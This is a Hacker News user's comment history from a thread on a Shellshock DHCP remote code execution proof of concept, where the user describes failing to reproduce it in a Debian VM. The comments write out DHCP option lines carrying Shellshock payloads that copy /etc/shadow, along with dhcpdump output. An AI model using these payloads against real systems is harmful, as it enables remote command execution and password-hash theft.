HNHacker News
TopNewBestAskShowJobs

exploit

1 karma · joined September 25, 2014

submissionscomments
exploit··on Shellshock DHCP Remote Code Execution – Proof of Concept
So could you get a root shell (on linux laptop)?
exploit··on Shellshock DHCP Remote Code Execution – Proof of Concept
Of course I've used dhclient for this (also with -r option) with ifconfig up/down. Not working. I've also tried to re-simlink sh to bash. Not working. I'd like to check py script by mschwager (https://github.com/mschwager/shellshock_poc), may be it will be OK.
exploit··on Shellshock DHCP Remote Code Execution – Proof of Concept
I've tried to replay this attack in VM environment using Debian, but no luck.

option dhcp_114_FW_URL code 114 = text; option dhcp_114_FW_URL "() { ignored;}; cat /etc/shadow > /tmp/shadow"

or

option domain-name "() { :;}; cat /etc/shadow > /tmp/shadow";

not working.

dhcpdump says that option sends correctly: OPTION: 53 ( 1) DHCP message type 5 (DHCPACK) OPTION: 54 ( 4) Server identifier 192.168.1.1 OPTION: 51 ( 4) IP address leasetime 600 (10m) OPTION: 1 ( 4) Subnet mask 255.255.255.0 OPTION: 3 ( 4) Routers 192.168.1.1 OPTION: 15 ( 39) Domainname () { :;}; cat /etc/shadow > /tmp/shadow

What could be the problem?